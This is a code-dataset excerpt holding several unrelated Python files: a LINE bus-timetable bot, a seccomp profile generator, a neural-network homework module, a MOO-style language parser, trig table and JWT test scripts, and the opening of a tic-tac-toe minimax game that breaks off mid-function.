[QuickReplyButton(action=MessageAction(label=f\"{support}\", text=f\"{support}\")) for support in support_list]\r\n result_contents = TextSendMessage(text=\"どの言語が好きですか?\",quick_reply=QuickReply(items=items))\r\n \r\n if event.message.text == \"位置情報\":\r\n items=[QuickReplyButton(action=LocationAction(label=\"Location\"))]\r\n result_contents = [TextSendMessage(text=\"位置情報ください\",quick_reply=QuickReply(items=items))]\r\n\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n print(\"完了\")\r\n\r\n\r\n# ボタン押したときに動く関数\r\n@handler.add(PostbackEvent)\r\ndef on_postback(event):\r\n\r\n result_contents = TextSendMessage(text=\"hello\")\r\n print(event)\r\n if event.postback.data == \"princess_line_bus\":\r\n print(event.postback.data)\r\n result_contents = [\r\n TextSendMessage(alt_text='princess_line_bus',text = \"プリンセスラインバスですね!\"),\r\n FlexSendMessage(alt_text='バス利用目的', contents = openJsonFile('json/bus_purpose.json'))\r\n ]\r\n bus_select_data[1] = 2\r\n bus_select_data_text[1] = \"プリンセスラインバス\"\r\n\r\n if event.postback.data == \"municipal_bus\":\r\n print(event.postback.data)\r\n result_contents = [\r\n TextSendMessage(alt_text='municipal_bus',text = \"市バスですね!\"),\r\n FlexSendMessage(alt_text='バス利用目的', contents = openJsonFile('json/bus_purpose.json'))\r\n ]\r\n bus_select_data[1] = 1\r\n bus_select_data_text[1] = \"市バス\"\r\n \r\n # periods_dict = {\"first_period\":1, \"second_period\":2, \"third_period\":3, \"fourth_period\":4, \"fifth_period\":5}\r\n # 上のdictのキーと押されたボタンのデータが一緒の時の結果をresult_contentsに代入\r\n if event.postback.data in periods_dict:\r\n bus_result = whatPeriod(event.postback.data)\r\n print(bus_result)\r\n result_contents = [TextSendMessage(text = bus_result[0]),TextSendMessage(text = bus_result[1])]\r\n\r\n \r\n print(bus_select_data)\r\n print(bus_select_data_text)\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n\r\n#位置情報を受け取った時\r\n@handler.add(MessageEvent, message=LocationMessage)\r\ndef handle_location(event):\r\n weather2 = tnk2.get_weather_from_location(event.message.address)\r\n print(weather2)\r\n result_contents = [\r\n TextSendMessage(text=\"ありがとう、愛してるよ\"),\r\n TextSendMessage(text=f\"住所は{event.message.address}なんだね\"),\r\n TextSendMessage(text=weather2)\r\n ]\r\n print(event)\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n\r\n\r\n# FlexMessageの用意\r\n# ファイルを読み込んだ変数を返す関数\r\ndef openJsonFile(filename):\r\n with open(filename) as f:\r\n print(\"ロード中\")\r\n flex_message_json_dict = json.load(f)\r\n print(flex_message_json_dict)\r\n return flex_message_json_dict\r\n\r\n# 登下校のボタンからデータ受け取ってバスの関数を回して結果のテキストと時間を返す\r\n# periodにはperiods_dictのキーが入る\r\ndef whatPeriod(period):\r\n if period != \"go_home\":\r\n # 登校、何限かをbus_select_dataに代入\r\n bus_select_data[0], bus_select_data[2] = 1, periods_dict[period]\r\n # 選んだ結果確認用テキストをbus_select_data_textに代入\r\n bus_select_data_text[0], bus_select_data_text[2] = \"登校\", periods_dict[period]\r\n # result_textに選択の最終確認のテキスト代入\r\n result_text = f\"「{bus_select_data_text[1]}で{bus_select_data_text[2]}限に{bus_select_data_text[0]}」ですね!\"\r\n \r\n\r\n \r\n else:\r\n bus_select_data[0], bus_select_data[2] = 2, periods_dict[period]\r\n bus_select_data_text[0] = \"下校\"\r\n result_text = f\"「{bus_select_data_text[1]}で{bus_select_data_text[0]}」ですね!\"\r\n\r\n\r\n print(bus_select_data)\r\n print(bus_select_data_text)\r\n print(result_text)\r\n # bus_tmpにBusTimeのインスタンス化、resultに関数の結果代入\r\n bus_tmp = bus.BusTime(bus_select_data[0],bus_select_data[1],bus_select_data[2])\r\n bus_result = bus_tmp.bus()\r\n return result_text, bus_result\r\n\r\n\r\n\r\n \r\n\r\nif __name__ == \"__main__\":\r\n# app.run()\r\n port = int(os.getenv(\"PORT\", 5000))\r\n # app.run(host=\"0.0.0.0\", port=port)\r\n serve(app, host=\"0.0.0.0\",port = port)","repo_name":"Miyai75/kwu_linebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13075531460","text":"import json\nimport sys\nimport subprocess\n\nsyscalls = set()\nwith open(sys.argv[1], 'r') as f:\n for line in f.readlines():\n syscalls.add(line.strip())\n\nfoo = {\n \"defaultAction\": \"SCMP_ACT_ERRNO\",\n \"architectures\": [\n \"SCMP_ARCH_X86_64\",\n \"SCMP_ARCH_X86\",\n \"SCMP_ARCH_X32\"\n ],\n \"syscalls\": []\n}\n\nfor i in syscalls:\n item = {\n \"name\": i,\n \"action\": \"SCMP_ACT_ALLOW\",\n \"args\": []\n }\n\n foo['syscalls'].append(item)\n with open(sys.argv[2], 'w') as f:\n f.write(json.dumps(foo, indent=2))\n","repo_name":"tuxx42/lnd-with-seccomp","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30059720614","text":"import numpy as np\n\nfrom .layers import *\nfrom .layer_utils import *\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. \n\"\"\"\n\nclass TwoLayerNet(object):\n \"\"\"\n A two-layer fully-connected neural network with ReLU nonlinearity and\n softmax loss that uses a modular layer design. We assume an input dimension\n of D, a hidden dimension of H, and perform classification over C classes.\n \n The architecure should be affine - relu - affine - softmax.\n\n Note that this class does not implement gradient descent; instead, it\n will interact with a separate Solver object that is responsible for running\n optimization.\n\n The learnable parameters of the model are stored in the dictionary\n self.params that maps parameter names to numpy arrays.\n \"\"\"\n \n def __init__(self, input_dim=3*32*32, hidden_dims=100, num_classes=10,\n dropout=0, weight_scale=1e-3, reg=0.0):\n \"\"\"\n Initialize a new network.\n\n Inputs:\n - input_dim: An integer giving the size of the input\n - hidden_dims: An integer giving the size of the hidden layer\n - num_classes: An integer giving the number of classes to classify\n - dropout: Scalar between 0 and 1 giving dropout strength.\n - weight_scale: Scalar giving the standard deviation for random\n initialization of the weights.\n - reg: Scalar giving L2 regularization strength.\n \"\"\"\n self.params = {}\n self.reg = reg\n \n # ================================================================ #\n # YOUR CODE HERE:\n # Initialize W1, W2, b1, and b2. Store these as self.params['W1'], \n # self.params['W2'], self.params['b1'] and self.params['b2']. The\n # biases are initialized to zero and the weights are initialized\n # so that each parameter has mean 0 and standard deviation weight_scale.\n # The dimensions of W1 should be (input_dim, hidden_dim) and the\n # dimensions of W2 should be (hidden_dims, num_classes)\n # ================================================================ #\n\n self.params['W1'] = np.random.randn(input_dim, hidden_dims) * weight_scale\n self.params['W2'] = np.random.randn(hidden_dims, num_classes) * weight_scale\n self.params['b1'] = np.zeros((hidden_dims, 1))\n self.params['b2'] = np.zeros((num_classes, 1))\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n def loss(self, X, y=None):\n \"\"\"\n Compute loss and gradient for a minibatch of data.\n\n Inputs:\n - X: Array of input data of shape (N, d_1, ..., d_k)\n - y: Array of labels, of shape (N,). y[i] gives the label for X[i].\n\n Returns:\n If y is None, then run a test-time forward pass of the model and return:\n - scores: Array of shape (N, C) giving classification scores, where\n scores[i, c] is the classification score for X[i] and class c.\n\n If y is not None, then run a training-time forward and backward pass and\n return a tuple of:\n - loss: Scalar value giving the loss\n - grads: Dictionary with the same keys as self.params, mapping parameter\n names to gradients of the loss with respect to those parameters.\n \"\"\" \n scores = None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the forward pass of the two-layer neural network. Store\n # the class scores as the variable 'scores'. Be sure to use the layers\n # you prior implemented.\n # ================================================================ # \n\n out1, cache1 = affine_forward(X, self.params['W1'], self.params['b1']) \n out2, cache2 = relu_forward(out1)\n scores, cache3 = affine_forward(out2, self.params['W2'], self.params['b2']) \n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # If y is None then we are in test mode so just return scores\n if y is None:\n return scores\n \n loss, grads = 0, {}\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backward pass of the two-layer neural net. Store\n # the loss as the variable 'loss' and store the gradients in the \n # 'grads' dictionary. For the grads dictionary, grads['W1'] holds\n # the gradient for W1, grads['b1'] holds the gradient for b1, etc.\n # i.e., grads[k] holds the gradient for self.params[k].\n #\n # Add L2 regularization, where there is an added cost 0.5*self.reg*W^2\n # for each W. Be sure to include the 0.5 multiplying factor to \n # match our implementation.\n #\n # And be sure to use the layers you prior implemented.\n # ================================================================ # \n\n loss, dx = softmax_loss(scores, y)\n loss += 0.5 * self.reg * (np.linalg.norm(self.params['W1'], 'fro')**2 + np.linalg.norm(self.params['W2'], 'fro')**2)\n\n dh1, dW2, db2 = affine_backward(dx, cache3)\n da1 = relu_backward(dh1, cache2)\n dx2, dW1, db1 = affine_backward(da1, cache1)\n\n grads['W1'] = dW1 + self.reg * self.params['W1']\n grads['b1'] = db1.T\n grads['W2'] = dW2 + self.reg * self.params['W2']\n grads['b2'] = db2.T\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n return loss, grads\n\n\nclass FullyConnectedNet(object):\n \"\"\"\n A fully-connected neural network with an arbitrary number of hidden layers,\n ReLU nonlinearities, and a softmax loss function. This will also implement\n dropout and batch normalization as options. For a network with L layers,\n the architecture will be\n \n {affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax\n \n where batch normalization and dropout are optional, and the {...} block is\n repeated L - 1 times.\n \n Similar to the TwoLayerNet above, learnable parameters are stored in the\n self.params dictionary and will be learned using the Solver class.\n \"\"\"\n\n def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,\n dropout=0, use_batchnorm=False, reg=0.0,\n weight_scale=1e-2, dtype=np.float32, seed=None):\n \"\"\"\n Initialize a new FullyConnectedNet.\n \n Inputs:\n - hidden_dims: A list of integers giving the size of each hidden layer.\n - input_dim: An integer giving the size of the input.\n - num_classes: An integer giving the number of classes to classify.\n - dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then\n the network should not use dropout at all.\n - use_batchnorm: Whether or not the network should use batch normalization.\n - reg: Scalar giving L2 regularization strength.\n - weight_scale: Scalar giving the standard deviation for random\n initialization of the weights.\n - dtype: A numpy datatype object; all computations will be performed using\n this datatype. float32 is faster but less accurate, so you should use\n float64 for numeric gradient checking.\n - seed: If not None, then pass this random seed to the dropout layers. This\n will make the dropout layers deteriminstic so we can gradient check the\n model.\n \"\"\"\n self.use_batchnorm = use_batchnorm\n self.use_dropout = dropout > 0\n self.reg = reg\n self.num_layers = 1 + len(hidden_dims)\n self.dtype = dtype\n self.params = {}\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Initialize all parameters of the network in the self.params dictionary.\n # The weights and biases of layer 1 are W1 and b1; and in general the \n # weights and biases of layer i are Wi and bi. The\n # biases are initialized to zero and the weights are initialized\n # so that each parameter has mean 0 and standard deviation weight_scale.\n # ================================================================ #\n \n dims = [input_dim] + hidden_dims + [num_classes]\n for i in range(self.num_layers):\n self.params['W' + str(i + 1)] = np.random.normal(0, weight_scale, size=(dims[i], dims[i + 1]))\n self.params['b' + str(i + 1)] = np.zeros((dims[i + 1], 1))\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # When using dropout we need to pass a dropout_param dictionary to each\n # dropout layer so that the layer knows the dropout probability and the mode\n # (train / test). You can pass the same dropout_param to each dropout layer.\n self.dropout_param = {}\n if self.use_dropout:\n self.dropout_param = {'mode': 'train', 'p': dropout}\n if seed is not None:\n self.dropout_param['seed'] = seed\n \n # With batch normalization we need to keep track of running means and\n # variances, so we need to pass a special bn_param object to each batch\n # normalization layer. You should pass self.bn_params[0] to the forward pass\n # of the first batch normalization layer, self.bn_params[1] to the forward\n # pass of the second batch normalization layer, etc.\n self.bn_params = []\n if self.use_batchnorm:\n self.bn_params = [{'mode': 'train'} for i in np.arange(self.num_layers - 1)]\n \n # Cast all parameters to the correct datatype\n for k, v in self.params.items():\n self.params[k] = v.astype(dtype)\n\n\n def loss(self, X, y=None):\n \"\"\"\n Compute loss and gradient for the fully-connected net.\n\n Input / output: Same as TwoLayerNet above.\n \"\"\"\n X = X.astype(self.dtype)\n mode = 'test' if y is None else 'train'\n\n # Set train/test mode for batchnorm params and dropout param since they\n # behave differently during training and testing.\n if self.dropout_param is not None:\n self.dropout_param['mode'] = mode \n if self.use_batchnorm:\n for bn_param in self.bn_params:\n bn_param[mode] = mode\n\n scores = None\n \n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the forward pass of the FC net and store the output\n # scores as the variable \"scores\".\n # ================================================================ #\n\n param = {}\n h = {}\n h[0] = [X]\n\n for i in range(self.num_layers):\n param[i + 1] = affine_forward(h[i][0], self.params['W' + str(i + 1)], self.params['b' + str(i + 1)])\n h[i + 1] = relu_forward(param[i + 1][0])\n\n scores = param[self.num_layers][0]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # If test mode return early\n if mode == 'test':\n return scores\n\n loss, grads = 0.0, {}\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backwards pass of the FC net and store the gradients\n # in the grads dict, so that grads[k] is the gradient of self.params[k]\n # Be sure your L2 regularization includes a 0.5 factor.\n # ================================================================ #\n\n loss, dx = softmax_loss(scores, y)\n weights = [self.params['W' + str(i + 1)] for i in range(self.num_layers)]\n loss += 0.5 * self.reg * sum([np.linalg.norm(weight, 'fro')**2 for weight in weights])\n\n das = {}\n dhs = {}\n dws = {}\n dbs = {}\n das[self.num_layers] = dx\n\n for i in range(self.num_layers)[::-1]:\n dh, dw, db = affine_backward(das[i + 1], param[i + 1][1])\n dhs[i] = dh \n dws[i + 1] = dw\n dbs[i + 1] = db\n if i != 0:\n das[i] = relu_backward(dhs[i], h[i][1])\n\n for i in range(self.num_layers):\n grads['W' + str(i + 1)] = dws[i + 1] + self.reg * self.params['W' + str(i + 1)] \n grads['b' + str(i + 1)] = dbs[i + 1].T\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n return loss, grads\n","repo_name":"Wangxh329/Neural-Networks-and-Deep-Learning","sub_path":"homework/hw3/code/nndl/fc_net.py","file_name":"fc_net.py","file_ext":"py","file_size_in_byte":12651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5027600060","text":"from pyparsing import *\nfrom language import *\n\n\nclass Parser(object):\n def __init__(self):\n self.parser = None\n self.init_parser()\n \n def nest(self, tokens):\n return [list(tokens)]\n \n def init_parser(self):\n \"\"\" phase 1:\n most important part is to build the meta-parser for \"expr\". expr represents any atomic action that returns a value, and the bulk of\n the code in any program will consist primarily of exprs and flow control. expr is heavily recursive, because most types of expr can\n take another expr as an input value.\n \"\"\"\n point = Literal( \".\" )\n plus = Literal( \"+\" )\n minus = Literal( \"-\" )\n mult = Literal( \"*\" )\n div = Literal( \"/\" )\n lpar = Literal( \"(\" ).suppress()\n rpar = Literal( \")\" ).suppress()\n llbr = Literal( \"[\" ).suppress()\n rlbr = Literal( \"]\" ).suppress()\n addop = plus | minus\n multop = mult | div\n expop = Literal( \"^\" )\n quote = Literal( '\"' )\n excl = Literal( \"!\" )\n call = Literal( \":\" )\n endl = Literal( \";\" )\n lisep = Literal( \",\" ).suppress()\n objn = Literal( \"#\" )\n ref = Literal( \"$\" )\n assign = Literal( \"=\" )\n flatten = Literal( \"@\" )\n neg = excl.copy()\n \n\n expr = Forward()\n ident = Word(alphas+\"_\", alphas+nums+\"_\")\n ident.setParseAction(VMIdent.parse)\n variable = Word(alphas+\"_\", alphas+nums+\"_\")\n variable.setParseAction(VMVariable.parse)\n \n \n integer = Word( \"+-\"+nums, nums )\n fnumber = Combine( integer + \n Optional( point + Optional( Word( nums ) ) ) +\n Optional( CaselessLiteral('e') + Word( \"+-\"+nums, nums ) ) )\n objref = objn + Word( \"+-\"+nums, nums )\n objref.setParseAction(VMObjRef.parse)\n coreref = (ref + ident)\n coreref.setParseAction(VMCoreRef.parse)\n bexpr = (lpar + expr + rpar).setParseAction(self.nest)\n objrefexpr = bexpr | coreref | variable | objref\n identexpr = bexpr | ident\n propref = (objrefexpr + point + ident).setParseAction(VMPropRef.parse) | coreref\n fileref = (objrefexpr + excl + ident).setParseAction(VMFileRef.parse)\n\n argspec = Optional(delimitedList(expr))\n argspec.setParseAction(StackToList.parse)\n funccall = objrefexpr + call + identexpr + lpar + argspec + rpar\n \n fnumber.setParseAction(VMFloat.parse)\n integer.setParseAction(VMInteger.parse)\n funccall.setParseAction(CallFunc.parse)\n \n stringlit = QuotedString(quoteChar='\"', escChar='\\\\').setParseAction(VMString.parse)\n \n atom = Forward()\n bifunction = (ident + lpar + argspec + rpar).setParseAction(CallBuiltin.parse)\n \n flatexpr = Optional(flatten) + expr\n flatexpr.setParseAction(Flatten.parse)\n listlit = llbr + Optional(flatexpr) + ZeroOrMore(lisep + flatexpr) + rlbr\n literal = integer | fnumber | stringlit | listlit | objref\n \n atom << (Optional(minus) + ZeroOrMore(neg) + (propref | literal | bifunction | bexpr | variable | funccall | fileref)).setParseAction(UnaryOp.parse)\n atom = atom.streamline()\n \n \n # by defining exponentiation as \"atom [ ^ factor ]...\" instead of \"atom [ ^ atom ]...\", we get right-to-left exponents, instead of left-to-righ\n # that is, 2^3^2 = 2^(3^2), not (2^3)^2.\n factor = Forward()\n factor << atom + ZeroOrMore( (expop + factor).setParseAction(ArithExp.parse) )\n factor = factor.streamline()\n \n term = factor + ZeroOrMore( (multop + factor).setParseAction(ArithMul.parse) )\n #term.setParseAction(self.nest)\n mathexpr = term + ZeroOrMore( (addop + term).setParseAction(ArithAdd.parse) )\n #mathexpr.setParseAction(self.nest)\n \n opeq = Literal('==')\n opneq = Literal('!=')\n opgteq = Literal('<=')\n oplteq = Literal('>=')\n oplt = Literal('<')\n opgt = Literal('>')\n opin = Keyword('in')\n \n opcmp = opeq | opneq | opgteq | oplteq | oplt | opgt | opin\n eqexpr = mathexpr + Optional( (opcmp + mathexpr).setParseAction(BoolCompare.parse) )\n \n opand = Literal('&&') | Keyword('and')\n opor = Literal('||') | Keyword('or')\n opxor = Literal('~~') | Keyword('xor')\n \n opbool = opand | opor | opxor\n boolexpr = eqexpr + ZeroOrMore( (opbool + eqexpr).setParseAction(BoolLogic.parse) )\n \n \n assignable = variable | propref | fileref\n assignexpr = Optional(assignable + assign) + boolexpr\n expr << assignexpr.setParseAction(Assignment.parse)\n expr = expr.streamline()\n\n \n \n \"\"\" phase 2:\n now that expr is built, we can move on to handling flow control statements, and after that the structure of the program\n is mostly defined\n \"\"\"\n \n ifstart = (Keyword(\"if\") + bexpr)\n ifelseif = (Keyword(\"elseif\") + bexpr)\n ifelse = Keyword(\"else\")\n ifend = Keyword(\"endif\")\n trystart = Keyword(\"try\")\n tryexcept = (Keyword(\"except\") + variable)\n tryelse = Keyword(\"else\")\n tryfinally = Keyword(\"finally\")\n tryend = Keyword(\"endtry\")\n whilestart = (Keyword(\"while\") + bexpr)\n whileend = Keyword(\"endwhile\")\n forstart = (Keyword(\"for\") + variable + Keyword(\"in\") + bexpr)\n forend = Keyword(\"endfor\")\n\n kwdbreak = Keyword(\"break\").setParseAction(LoopBreak)\n kwdcontinue = Keyword(\"continue\").setParseAction(LoopContinue)\n kwdreturn = Keyword(\"return\")\n\n rtnexpr = (kwdreturn + expr).setParseAction(KeywordReturn.parse)\n line = expr | rtnexpr\n lline = expr | rtnexpr | kwdcontinue | kwdbreak\n exprblock = ZeroOrMore(line + endl)\n lexprblock = ZeroOrMore(lline + endl)\n\n block = Forward()\n lblock = Forward()\n ifblock = ifstart + block + ZeroOrMore(ifelseif + block) + Optional(ifelse + block) + ifend\n tryblock = trystart + block + Optional(tryexcept + block + Optional(tryelse + block)) + Optional(tryfinally + block) + tryend\n iflblock = ifstart + lblock + ZeroOrMore(ifelseif + lblock) + Optional(ifelse + lblock) + ifend\n trylblock = trystart + lblock + Optional(tryexcept + lblock + Optional(tryelse + lblock)) + Optional(tryfinally + block) + tryend\n whileblock = whilestart + lblock + whileend\n forblock = forstart + lblock + forend\n \n ifblock.setParseAction(IfBlock.parse)\n tryblock.setParseAction(TryBlock.parse)\n iflblock.setParseAction(IfBlock.parse)\n trylblock.setParseAction(TryBlock.parse)\n whileblock.setParseAction(WhileBlock.parse)\n forblock.setParseAction(ForeachBlock.parse)\n \n # blocks are used for code blocks that are outside a loop. Inside a loop, all code blocks are lblocks\n # which allow loop-control keywords like break and continue (except try-finally, it wouldn't make sense)\n \n block << (exprblock + Optional(ifblock | tryblock | whileblock | forblock) + exprblock)\n lblock << (lexprblock + Optional(iflblock | trylblock | whileblock | forblock) + lexprblock)\n\n block = block.streamline()\n lblock = lblock.streamline()\n \n block.setParseAction(self.nest)\n lblock.setParseAction(self.nest)\n\n endl.setParseAction(DiscardStack.parse)\n self.parser = block\n #print(argspec.parseString(\"hello(hi.xyz)\", parseAll=True))\n #print(block.parseString(u\"hi.xyz + #555.test;\", parseAll=True))\n #print(block.parseString(\"\"\"serverlog();\"\"\"))\n\n def parse(self, data):\n rv = self.parser.parseString(data, parseAll=True)\n \n return optimizer.optimize(rv)\n\n def parse_command(self, line):\n ls = line.split(' ')\n cmd = ls[0]\n argstr = ' '.join(ls[1:])\n vars = {\n 'cmdstr': line,\n 'cmd': cmd,\n 'argstr': argstr,\n 'args': [x.strip() for x in ls[1:] if x.strip() != '']\n }\n \n return [cmd, vars]\n\n def test(self):\n #print(self.parse(u\"if (1) #740.xyz + -hello.world; endif\"))\n \n data = open(\"test.moo\", \"r\", encoding=\"utf-8\").read()\n rv = self.parse(data)\n print(rv)\n return rv\n \n \nstatic_parser = Parser()\n\nif __name__ == \"__main__\":\n p = Parser()\n p.test()\n","repo_name":"cecilkorik/mung","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34061356483","text":"import math\nimport matplotlib.pyplot as plt\n\ndef gen_array(func):\n for n in range(1024):\n n = round(func((float(n) / 1024.0)*math.pi*2) * 2**16)\n if n > 2**31 - 1 :\n n = 2**32 - 1\n if n < -(2**31) :\n n = -(2**31)\n if n < 0 :\n n += 2**32\n \n yield hex(n)\n\nh = open(\"matharrays.h\",\"w\")\n\nh.write(\n\"\"\"#ifndef H_MATH_ARRAYS \n#define H_MATH_ARRAYS\n#include \n#include \n\"\"\")\n\nh.write(\"extern int32_t tan_a[1024];\\n\")\n\nh.write(\"extern int32_t cot_a[1024];\\n\")\n\nh.write(\"extern int32_t sin_a[1024];\\n\")\n\nh.write(\"extern int32_t cos_a[1024];\\n\")\n\nh.write(\"#endif\")\n\nh.close()\n\nc = open(\"matharrays.c\",\"w\")\n\nc.write(\n\"\"\"#include \\n\"\"\")\n\nc.write(\"int32_t tan_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.tan(a)))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t cot_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: 1/math.tan(a) if math.tan(a) != 0 else 0xFFFFFFFF))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t sin_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.sin(a)))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t cos_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.cos(a)))))\nc.write(\"};\\n\")\n\nc.close()\n","repo_name":"emwebb/3dmaze","sub_path":"genmatharray.py","file_name":"genmatharray.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18694946678","text":"import os\nimport jwt\nfrom unittest import TestCase\nfrom json_web_token import create_token\n\nSECRET_KEY = os.environ.get('SECRET_KEY')\n\n\nclass TokenCreationTestCase(TestCase):\n ''' create token test '''\n\n def test_create_token_returns_valid_jwt(self):\n # create test user\n user = {\n 'username': 'test_user',\n 'is_admin': False,\n }\n\n # create new token with user data\n token = create_token(user)\n self.assertIsInstance(token, str)\n\n # decode the token to verify its contents\n payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])\n self.assertIsInstance(payload, dict)\n self.assertEqual(payload['username'], user['username'])\n self.assertEqual(payload['is_admin'], user['is_admin'])\n\n def test_create_token_with_invalid_user(self):\n # create invalid user\n user = {\n 'is_admin': True,\n }\n\n # create new token with invalid user data\n self.assertRaises(KeyError, create_token, user)\n\n def test_create_token_with_no_user(self):\n user = None\n\n self.assertRaises(TypeError, create_token, user)","repo_name":"brianhjoo/Pixie","sub_path":"pixie-backend/helpers/tests_token.py","file_name":"tests_token.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1276785268","text":"import torch\n\n\ndef ONInvariantMap(xs):\n out = torch.zeros_like(xs)\n out[:, 0] = torch.norm(xs, dim=1)\n return out\n\n\ndef ENInvariantMap(xs):\n def center_around_0(inp):\n # Center around 0 for translation invariance\n CoM = torch.mean(inp, dim=1)\n centered = inp - CoM[:, None, :]\n return centered\n\n def order(centered):\n # Order by radius to make permutation invariant\n r = torch.sqrt(centered[:, :, 0] ** 2 + centered[:, :, 1] ** 2)\n order = torch.argsort(r)\n sorted = centered[torch.arange(order.size(0)).unsqueeze(1).repeat((1, order.size(1))), order]\n return sorted\n\n def rotate(centered, sorted):\n r = torch.sqrt(centered[:, :, 0] ** 2 + centered[:, :, 1] ** 2)\n # Rotate to x axis\n top_1 = sorted[:, -1]\n top_r_1 = r.max(dim=1)[0]\n norm_1 = top_1 / top_r_1[:, None]\n t0 = torch.cat([norm_1[:, 0, None], -norm_1[:, 1, None]], dim=1).T\n t1 = torch.cat([norm_1[:, 1, None], norm_1[:, 0, None]], dim=1).T\n G_1 = torch.stack([t0, t1]).permute([2, 1, 0])[:, None, :, :]\n rotated_1 = torch.matmul(G_1, sorted[:, :, :, None]).squeeze()\n return rotated_1\n\n inp = xs.view(-1, 4, 2)\n centered = center_around_0(inp)\n sorted = order(centered)\n rotated = rotate(centered, sorted)\n\n s_1 = sorted.size()\n input = rotated.view((s_1[0], s_1[1] * s_1[2]))\n\n return input\n","repo_name":"NeurIPS21-3353/CodeRepo","sub_path":"samplers/svgd_sampling/kernels/maps/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72030058027","text":"# Messages\nRUN_AWAY = \"You ran away!\"\nQUIT = \"Thanks for playing!\"\nGAME_OVER_WIN = 'Game Over, You Win!'\nGAME_OVER_LOSE = \"Game Over, You Lose.\"\nSTART_BATTLE = \"Fight!\"\nACTIONS_PROMPT = \"Choose action [F]ight/[C]haracter/[Q]uit: \"\nBATTLE_PROMPT = \"Choose action [A]ttack/[R]un: \"\nGAME_START = \"Welcome to the game!\"\n\n# Enemy Names\nENEMY_NAME = ['Orc', 'Goblin', 'Troll', 'Bat']\n","repo_name":"Dkothand/python_command_rpg_game","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9095536579","text":"\"\"\"\r\nA console-based Tic-Tic-Toe game that uses the MiniMax algorithm for a perfect AI.\r\nIt is impossible to win this game against the bot, best case scenario is a tie.\r\n\r\nAuthor: Josh Graham\r\nDate: 5/30/2020\r\n\"\"\"\r\n\r\nimport random\r\nimport sys\r\n\r\nclass Player:\r\n \"\"\"\r\n This class defines a player.\r\n\r\n Attributes:\r\n name (str): The name of the player.\r\n symbol (str): A single character to uniquely represent the player (usually 'X' or 'O').\r\n \"\"\"\r\n\r\n def __init__(self, name, symbol):\r\n \"\"\"\r\n The constructor for the Player class.\r\n \r\n Parameters:\r\n name (str): The name of the player.\r\n symbol (str): A single character to uniquely represent the player (usually 'X' or 'O'). \r\n \"\"\"\r\n\r\n self.name = name\r\n self.symbol = symbol\r\n\r\nclass Board:\r\n \"\"\"\r\n This class defines the board to be used for the game.\r\n\r\n Attributes:\r\n x (int): An x coordinate for the board\r\n y (int): A y coordinate for the board\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n The constructor for the Board class.\r\n\r\n Generates an empty game board.\r\n \"\"\"\r\n\r\n self.board = [['-', '-', '-'],\r\n ['-', '-', '-'],\r\n ['-', '-', '-']]\r\n\r\n def show_board(self):\r\n \"\"\"Displays the current game board to the user by printing it to the console.\"\"\"\r\n\r\n for row in self.board:\r\n for col in row:\r\n print(col, end=\" \")\r\n print(\"\")\r\n\r\n def set_player(self, player, x, y):\r\n \"\"\"\r\n Places the symbol of the player on to the board at a specified position.\r\n\r\n If the player is the bot, the ai function is called for choosing it's position.\r\n\r\n Parameters:\r\n player (obj): The current player object whose turn it is.\r\n x (int): The x coordinate of where the player is placing their symbol.\r\n y (int): The y coordinate of where the player is placing their symbol.\r\n \"\"\"\r\n\r\n if(player.name == \"Bot\"):\r\n # Calls the ai function to get the best possible coordinates\r\n best_x, best_y = ai(self, player)\r\n self.board[best_x][best_y] = player.symbol\r\n else:\r\n 